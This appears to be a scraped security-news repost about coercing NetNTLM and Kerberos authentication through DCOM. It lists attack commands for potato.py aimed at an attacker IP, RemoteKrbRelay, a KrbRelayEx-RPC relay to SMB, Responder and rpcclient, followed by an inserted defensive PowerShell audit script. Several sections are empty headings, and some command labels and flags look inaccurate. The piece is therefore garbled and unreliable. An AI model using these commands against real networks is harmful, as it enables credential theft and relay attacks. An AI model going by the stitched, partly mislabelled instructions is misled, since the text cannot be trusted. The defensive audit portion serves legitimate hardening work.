Andrew Oliveau recently published a technique for triggering NetNTLMv1/NetNTLMv2 hashes via DCOM using an administrative account. This method allows for relaying or cracking these hashes, which can be useful in penetration testing and red team engagements.
Original Technique:
Alternative Approach:
Instead of modifying AppIDs through the remote registry so that they run as the interactive user, the CLSIDs that are already configured to run as the interactive user can be used to coerce RPC authentication from logged-on users.
Limitations:
- Remotely triggered DCOM RPC authentication via NTLM/Kerberos cannot be relayed to SMB (results in STATUS_BAD_IMPERSONATION_LEVEL).
- No relaying to LDAP due to DCOM hardening.
- Primarily useful for hash retrieval and cracking.
You Should Know:
1. Modifying Potato.py for NetNTLMv2 Capture
The original Potato.py tool requires slight modifications to store NetNTLMv2 hashes. A Pull Request (PR) has been submitted for this enhancement:
- Potato.py PR for NetNTLMv2 Storage
Example Command:
python3 potato.py -i <attacker_ip> -l <listener_port> -H <output_hash_file>
2. Enhancing RemoteKrbRelay for Hash Retrieval
Similarly, RemoteKrbRelay lacked NetNTLMv2 storage capability. A PR has been submitted to address this:
- RemoteKrbRelay PR for Hash Storage
Usage:
./RemoteKrbRelay -t <target> -c <CLSID> -o <output_file>
3. Relaying Kerberos RPC to SMB via KrbRelayEx-RPC
With slight modifications, KrbRelayEx-RPC can relay incoming Kerberos RPC authentication to SMB (thanks to Andrea Pierini for the guidance).
Requirements:
- Must be executed on a Linux host (port 135 is already bound on Windows).
- A custom SPN domain (can be created via ADIDNS).
Modification Details:
Example Setup:
./KrbRelayEx-RPC --spn HTTP/<fake_domain> --target <smb_target> --relay
What Undercode Says:
This technique is powerful for credential harvesting in internal penetration tests but has limitations due to DCOM hardening. Key takeaways:
- Linux is preferred for RPC relaying (port 135 restrictions on Windows).
- Kerberos relaying requires custom SPNs (ADIDNS can help).
- NTLM relaying is restricted to hash extraction only.
Additional Useful Commands:
- Check DCOM permissions:
Get-WmiObject -Namespace "root\cimv2" -Class Win32_DCOMApplicationSetting
- Force NTLM authentication via RPC:
rpcclient -U "" -N <target_ip> -c "getusername"
- Extract NetNTLMv2 with Responder:
sudo responder -I eth0 -v
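As a defender-side counterpart to the commands above, the following audit script is an added example; it is not part of the original post and not code from the Potato.py, RemoteKrbRelay or KrbRelayEx-RPC projects. It checks the conditions this technique depends on: whether NetNTLMv1 is still accepted (LmCompatibilityLevel), whether DCOM hardening is enforced (the RequireIntegrityActivationAuthenticationLevel value under HKLM\SOFTWARE\Microsoft\Ole\AppCompat), whether SMB signing is required, which DCOM AppIDs run as the interactive user, and whether any recent network logon in the Security log used NetNTLMv1. The registry locations and event 4624 fields are standard Windows ones; the expected values and the 24-hour lookback are this example's own policy choices and should be adjusted to your baseline.

```powershell
# Added example (not from the original post): audit a Windows host for the
# conditions that make DCOM-triggered NetNTLM capture useful to an attacker.
# Run in an elevated PowerShell session on the host being reviewed.
$findings = @()

# 1. NetNTLMv1 acceptance. LmCompatibilityLevel 5 = send NTLMv2 only, refuse LM and NTLMv1.
#    (Expected value 5 is this example's policy choice.)
$lsa = Get-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' -ErrorAction SilentlyContinue
$lmLevel = if ($null -ne $lsa.LmCompatibilityLevel) { $lsa.LmCompatibilityLevel } else { 'not set (OS default)' }
if ($lmLevel -ne 5) {
    $findings += "LmCompatibilityLevel is '$lmLevel'; set it to 5 so NetNTLMv1 is neither sent nor accepted."
}

# 2. DCOM hardening (KB5004442). 1 = activation requires RPC_C_AUTHN_LEVEL_PKT_INTEGRITY,
#    which is what breaks DCOM-sourced relays to LDAP as noted in the post.
$ole = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Ole\AppCompat' -ErrorAction SilentlyContinue
$dcomHardening = $ole.RequireIntegrityActivationAuthenticationLevel
if ($dcomHardening -ne 1) {
    $findings += "RequireIntegrityActivationAuthenticationLevel is '$dcomHardening'; expected 1 (DCOM hardening enforced)."
}

# 3. SMB signing on the server side. DCOM-sourced relays already fail against SMB,
#    but other coercion sources do not, so signing should still be required.
$smb = Get-SmbServerConfiguration
if (-not $smb.RequireSecuritySignature) {
    $findings += 'SMB server does not require signing; enable RequireSecuritySignature.'
}

# 4. DCOM AppIDs configured to run as the interactive user. These are the
#    entries the "alternative approach" relies on; compare against your baseline.
$interactive = Get-CimInstance -ClassName Win32_DCOMApplicationSetting |
    Where-Object { $_.RunAsUser -eq 'Interactive User' } |
    Select-Object AppID, Caption
foreach ($app in $interactive) {
    $findings += "AppID $($app.AppID) ('$($app.Caption)') is configured to run as Interactive User."
}

# 5. Recent network logons (4624, LogonType 3) whose LmPackageName is 'NTLM V1':
#    each one is a NetNTLMv1 exchange that could have been captured and cracked.
$since  = (Get-Date).AddDays(-1)   # lookback window is this example's choice
$events = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4624; StartTime = $since } -ErrorAction SilentlyContinue
foreach ($e in $events) {
    $xml  = [xml]$e.ToXml()
    $data = @{}
    foreach ($node in $xml.Event.EventData.Data) { $data[$node.Name] = $node.'#text' }
    if ($data.LogonType -eq '3' -and $data.LmPackageName -eq 'NTLM V1') {
        $findings += "NTLMv1 network logon: $($data.TargetDomainName)\$($data.TargetUserName) from $($data.IpAddress) at $($e.TimeCreated)."
    }
}

if ($findings.Count -eq 0) { 'No findings.' } else { $findings }
```

Reading the Security log and the Ole\AppCompat key needs administrative rights, which is why the script is meant to be run elevated. Check 5 only proves value if NTLM auditing is producing 4624 events with LmPackageName populated, so verify that first on a known NTLM logon before trusting an empty result.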
Expected Output:
A successful execution will yield NetNTLMv1/NetNTLMv2 hashes for offline cracking or further exploitation. Always ensure proper authorization before testing in production environments.
Further Reading:
References:
Reported By: UgcPost 7315634109320450048 – Hackers Feeds